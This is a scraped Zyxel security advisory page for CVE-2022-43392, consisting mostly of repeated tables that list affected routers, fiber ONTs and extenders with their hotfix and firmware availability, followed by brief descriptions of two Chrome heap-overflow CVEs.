Nebula FWA710

V1.15(ACGC.3)C0

Nebula NR7101

V1.15(ACCC.3)C0

NR5103

V4.19(ABYC.3)C0

NR5103E

Hotfix available now  
Standard firmware V1.00(ACDJ.0)C0 in Apr. 2023

NR7101

V1.00(ABUV.7)C0

NR7102

V1.00(ABYD.2)C0

NR7103

V1.00(ACCZ.1)C0

Fiber ONT

EP240P

Hotfix available now  
Standard firmware TBD

PM7320-B0

Hotfix available now  
Standard firmware TBD

PMG5317-T20B

Hotfix available now  
Standard firmware TBD

PMG5617GA

Hotfix available now  
Standard firmware TBD

PMG5622GA

Hotfix available now  
Standard firmware TBD

Product

Affected model

Patch availability\*

5G NR/4G LTE CPE

LTE7480-M804

V1.00(ABRA.6)C0

LTE7490-M904

V1.00(ABQY.5)C0

Nebula NR5101

V1.15(ACCG.3)C0

Nebula NR7101

V1.15(ACCC.3)C0

NR5101

V1.00(ABVC.6)C0

NR7101

V1.00(ABUV.7)C0

NR7102

V1.00(ABYD.2)C0

DSL/Ethernet CPE

DX3301-T0

Hotfix available now  
Standard firmware V5.50(ABVY.3.4)C0 in Feb. 2023

DX4510-B1

Hotfix available now  
Standard firmware V5.17(ABYL.5)C0 in Jun. 2023

DX5401-B0

Hotfix available now  
Standard firmware V5.17(ABYO.3.1)C0 in Feb. 2023

EMG3525-T50B

Hotfix available now  
Standard firmware V5.50(ABPM.7.3)C0 in Feb. 2023

EMG5523-T50B

Hotfix available now  
Standard firmware V5.50(ABPM.7.3)C0 in Feb. 2023

EMG5723-T50K

Hotfix available now  
Standard firmware V5.50(ABOM.8.2)C0 in Feb. 2023

EX3301-T0

Hotfix available now  
Standard firmware V5.50(ABVY.3.4)C0 in Feb. 2023

EX3510-B0

V5.17(ABUP.7)C0

EX5401-B0

Hotfix available now  
Standard firmware V5.17(ABYO.3.1)C0 in Feb. 2023

EX5501-B0

Hotfix available now  
Standard firmware V5.17(ABRY.3.2)C0 in Feb. 2023

EX5510-B0

V5.17(ABQX.7)C0

EX5512-T0

Hotfix available now  
Standard firmware TBD

EX5600-T1

Hotfix available now  
Standard firmware V5.70(ACDZ.0.1)C0 in Feb. 2023

EX5601-T0

Hotfix available now  
Standard firmware V5.70(ACDZ.0.1)C0 in Feb. 2023

EX5601-T1

Hotfix available now  
Standard firmware V5.70(ACDZ.0.1)C0 in Feb. 2023

VMG3927-T50K

Hotfix available now  
Standard firmware V5.50(ABOM.8.2)C0 in Feb. 2023

VMG4005-B50A

Hotfix available now  
Standard firmware V5.17(ABQA.2)C0 in Feb. 2023

VMG4005-B60A

Hotfix available now  
Standard firmware V5.17(ABQA.2)C0 in Feb. 2023

VMG8623-T50B

Hotfix available now  
Standard firmware V5.50(ABPM.7.3)C0 in Feb. 2023

VMG8825-T50K

Hotfix available now  
Standard firmware V5.50(ABOM.8.2)C0 in Feb. 2023

Fiber ONT

AX7501-B0

Hotfix available now  
Standard firmware V5.17(ABPC.3)C0 in Feb. 2023

PM3100-T0

Hotfix available now  
Standard firmware V5.42(ACBF.1.1)C0 in Feb. 2023

PM5100-T0

Hotfix available now  
Standard firmware V5.42(ACBF.1.1)C0 in Feb. 2023

PM7300-T0

Hotfix available now  
Standard firmware V5.42(ABYY.1)C0 in Feb. 2023

PM7320-B0

Hotfix available now  
Standard firmware TBD

PMG5317-T20B

Hotfix available now  
Standard firmware TBD

PMG5617-T20B2

Hotfix available now  
Standard firmware TBD

PMG5617GA

Hotfix available now  
Standard firmware TBD

PMG5622GA

Hotfix available now  
Standard firmware TBD

WiFi extender

WX3100-T0

Hotfix available now  
Standard firmware V5.50(ABVL.1.1)C0 in Feb. 2023

WX3401-B0

Hotfix available now  
Standard firmware V5.17(ABVE.2.1)C0 in Feb. 2023

WX5600-T0

Hotfix available now  
Standard firmware V5.70(ACEB.0.1)C0 in Feb. 2023

Product

Affected model

Patch availability\*

5G NR/4G LTE CPE

LTE3301-PLUS

Hotfix available now  
Standard firmware V1.00(ABQU.5)C0 in Feb. 2023

LTE5388-M804

Hotfix available now  
Standard firmware V1.00(ABSQ.4)C0 in Apr. 2023

LTE5398-M904

Hotfix available now  
Standard firmware V1.00(ABQV.3)C0 in Apr. 2023

LTE7240-M403

Hotfix available now  
Standard firmware V2.00(ABMG.6)C0 in May 2023

LTE7461-M602

Hotfix available now  
Standard firmware V2.00(ABQN.6)C0 in May 2023

LTE7480-M804

V1.00(ABRA.6)C0

LTE7480-S905

Hotfix available now  
Standard firmware V1.00(ABVN.6)C0 in May 2023

LTE7485-S905

Hotfix available now  
Standard firmware V2.00(ABQT.6)C0 in May 2023

LTE7490-M904

V1.00(ABQY.5)C0

Nebula LTE3301-PLUS

V1.15(ACCA.3)C0

Nebula LTE7461-M602

V1.15(ACEV.3)C0

Nebula NR5101

V1.15(ACCG.3)C0

Nebula NR7101

V1.15(ACCC.3)C0

NR5101

V1.00(ABVC.6)C0

NR7101

V1.00(ABUV.7)C0

NR7102

V1.00(ABYD.2)C0

DSL/Ethernet CPE

DX3301-T0

Hotfix available now  
Standard firmware V5.50(ABVY.3.4)C0 in Feb. 2023

DX4510-B1

Hotfix available now  
Standard firmware V5.17(ABYL.5)C0 in Jun. 2023

DX5401-B0

Hotfix available now  
Standard firmware V5.17(ABYO.3.1)C0 in Feb. 2023

EMG3525-T50B

Hotfix available now  
Standard firmware V5.50(ABPM.7.3)C0 in Feb. 2023

EMG5523-T50B

Hotfix available now  
Standard firmware V5.50(ABPM.7.3)C0 in Feb. 2023

EMG5723-T50K

Hotfix available now  
Standard firmware V5.50(ABOM.8.2)C0 in Feb. 2023

EX3301-T0

Hotfix available now  
Standard firmware V5.50(ABVY.3.4)C0 in Feb. 2023

EX3510-B0

V5.17(ABUP.7)C0

EX5401-B0

Hotfix available now  
Standard firmware V5.17(ABYO.3.1)C0 in Feb. 2023

EX5501-B0

Hotfix available now  
Standard firmware V5.17(ABRY.3.2)C0 in Feb. 2023

EX5510-B0

V5.17(ABQX.7)C0

EX5512-T0

Hotfix available now  
Standard firmware TBD

EX5600-T1

Hotfix available now  
Standard firmware V5.70(ACDZ.0.1)C0 in Feb. 2023

EX5601-T0

Hotfix available now  
Standard firmware V5.70(ACDZ.0.1)C0 in Feb. 2023

EX5601-T1

Hotfix available now  
Standard firmware V5.70(ACDZ.0.1)C0 in Feb. 2023

VMG3927-T50K

Hotfix available now  
Standard firmware V5.50(ABOM.8.2)C0 in Feb. 2023

VMG4005-B50A

Hotfix available now  
Standard firmware V5.17(ABQA.2)C0 in Feb. 2023

VMG4005-B60A

Hotfix available now  
Standard firmware V5.17(ABQA.2)C0 in Feb. 2023

VMG8623-T50B

Hotfix available now  
Standard firmware V5.50(ABPM.7.3)C0 in Feb. 2023

VMG8825-T50K

Hotfix available now  
Standard firmware V5.50(ABOM.8.2)C0 in Feb. 2023

Fiber ONT

AX7501-B0

Hotfix available now  
Standard firmware V5.17(ABPC.3)C0 in Feb. 2023

PM3100-T0

Hotfix available now  
Standard firmware V5.42(ACBF.1.1)C0 in Feb. 2023

PM5100-T0

Hotfix available now  
Standard firmware V5.42(ACBF.1.1)C0 in Feb. 2023

PM7300-T0

Hotfix available now  
Standard firmware V5.42(ABYY.1)C0 in Feb. 2023

PM7320-B0

Hotfix available now  
Standard firmware TBD

PMG5317-T20B

Hotfix available now  
Standard firmware TBD

PMG5617-T20B2

Hotfix available now  
Standard firmware TBD

PMG5617GA

Hotfix available now  
Standard firmware TBD

PMG5622GA

Hotfix available now  
Standard firmware TBD

WiFi extender

WX3100-T0

Hotfix available now  
Standard firmware V5.50(ABVL.1.1)C0 in Feb. 2023

WX3401-B0

Hotfix available now  
Standard firmware V5.17(ABVE.2.1)C0 in Feb. 2023

WX5600-T0

Hotfix available now  
Standard firmware V5.70(ACEB.0.1)C0 in Feb. 2023

Product

Affected model

Patch availability\*

5G NR/4G LTE CPE

LTE3301-PLUS

Hotfix available now  
Standard firmware V1.00(ABQU.5)C0 in Feb. 2023

LTE5388-M804

Hotfix available now  
Standard firmware V1.00(ABSQ.4)C0 in Apr. 2023

LTE5398-M904

Hotfix available now  
Standard firmware V1.00(ABQV.3)C0 in Apr. 2023

LTE7240-M403

Hotfix available now  
Standard firmware V2.00(ABMG.6)C0 in May 2023

LTE7461-M602

Hotfix available now  
Standard firmware V2.00(ABQN.6)C0 in May 2023

LTE7480-M804

V1.00(ABRA.6)C0

LTE7480-S905

Hotfix available now  
Standard firmware V1.00(ABVN.6)C0 in May 2023

LTE7485-S905

Hotfix available now  
Standard firmware V2.00(ABQT.6)C0 in May 2023

LTE7490-M904

V1.00(ABQY.5)C0

Nebula LTE3301-PLUS

V1.15(ACCA.3)C0

Nebula LTE7461-M602

V1.15(ACEV.3)C0

Nebula NR5101

V1.15(ACCG.3)C0

Nebula NR7101

V1.15(ACCC.3)C0

NR5101

V1.00(ABVC.6)C0

NR7101

V1.00(ABUV.7)C0

NR7102

V1.00(ABYD.2)C0

DSL/Ethernet CPE

DX3301-T0

Hotfix available now  
Standard firmware V5.50(ABVY.3.4)C0 in Feb. 2023

DX4510-B1

Hotfix available now  
Standard firmware V5.17(ABYL.5)C0 in Jun. 2023

DX5401-B0

Hotfix available now  
Standard firmware V5.17(ABYO.3.1)C0 in Feb. 2023

EMG3525-T50B

Hotfix available now  
Standard firmware V5.50(ABPM.7.3)C0 in Feb. 2023

EMG5523-T50B

Hotfix available now  
Standard firmware V5.50(ABPM.7.3)C0 in Feb. 2023

EMG5723-T50K

Hotfix available now  
Standard firmware V5.50(ABOM.8.2)C0 in Feb. 2023

EX3301-T0

Hotfix available now  
Standard firmware V5.50(ABVY.3.4)C0 in Feb. 2023

EX3510-B0

V5.17(ABUP.7)C0

EX5401-B0

Hotfix available now  
Standard firmware V5.17(ABYO.3.1)C0 in Feb. 2023

EX5501-B0

Hotfix available now  
Standard firmware V5.17(ABRY.3.2)C0 in Feb. 2023

EX5510-B0

V5.17(ABQX.7)C0

EX5512-T0

Hotfix available now  
Standard firmware TBD

EX5600-T1

Hotfix available now  
Standard firmware V5.70(ACDZ.0.1)C0 in Feb. 2023

EX5601-T0

Hotfix available now  
Standard firmware V5.70(ACDZ.0.1)C0 in Feb. 2023

EX5601-T1

Hotfix available now  
Standard firmware V5.70(ACDZ.0.1)C0 in Feb. 2023

VMG3927-T50K

Hotfix available now  
Standard firmware V5.50(ABOM.8.2)C0 in Feb. 2023

VMG4005-B50A

Hotfix available now  
Standard firmware V5.17(ABQA.2)C0 in Feb. 2023

VMG4005-B60A

Hotfix available now  
Standard firmware V5.17(ABQA.2)C0 in Feb. 2023

VMG8623-T50B

Hotfix available now  
Standard firmware V5.50(ABPM.7.3)C0 in Feb. 2023

VMG8825-T50K

Hotfix available now  
Standard firmware V5.50(ABOM.8.2)C0 in Feb. 2023

Fiber ONT

AX7501-B0

Hotfix available now  
Standard firmware V5.17(ABPC.3)C0 in Feb. 2023

PM3100-T0

Hotfix available now  
Standard firmware V5.42(ACBF.1.1)C0 in Feb. 2023

PM5100-T0

Hotfix available now  
Standard firmware V5.42(ACBF.1.1)C0 in Feb. 2023

PM7300-T0

Hotfix available now  
Standard firmware V5.42(ABYY.1)C0 in Feb. 2023

PM7320-B0

Hotfix available now  
Standard firmware TBD

PMG5317-T20B

Hotfix available now  
Standard firmware TBD

PMG5617-T20B2

Hotfix available now  
Standard firmware TBD

PMG5617GA

Hotfix available now  
Standard firmware TBD

PMG5622GA

Hotfix available now  
Standard firmware TBD

WiFi extender

WX3100-T0

Hotfix available now  
Standard firmware V5.50(ABVL.1.1)C0 in Feb. 2023

WX3401-B0

Hotfix available now  
Standard firmware V5.17(ABVE.2.1)C0 in Feb. 2023

WX5600-T0

Hotfix available now  
Standard firmware V5.70(ACEB.0.1)C0 in Feb. 2023

\*For the patch firmware without a download link, please reach out to your local Zyxel support team for the file.

Please note that the table does NOT include customized models for internet service providers (ISPs).

For ISPs, please contact your Zyxel sales or service representatives for further details.

For end-users who received your Zyxel device from an ISP, we recommend you reach out to the ISP’s support team directly, as the device may have custom-built settings.

For end-users who purchased the Zyxel devices on your own, please contact your local Zyxel support team for the new firmware file to ensure optimal protection, or visit our forum for further assistance.

**Got a question?**

Please contact your local service rep or visit Zyxel’s Community for further information or assistance.

**Acknowledgment**

Thanks to Positive Technologies for reporting the issues to us.

**Revision history**

2023-1-11: Initial release

CVE-2022-43392: Zyxel security advisory for command injection and buffer overflow vulnerabilities of CPE, fiber ONTs, and WiFi extenders | Zyxel Networks

Heap buffer overflow in libphonenumber in Google Chrome prior to 109.0.5414.74 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Low)

CVE-2023-0138

Heap buffer overflow in Platform Apps in Google Chrome on Chrome OS prior to 109.0.5414.74 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)

Tag

#buffer_overflow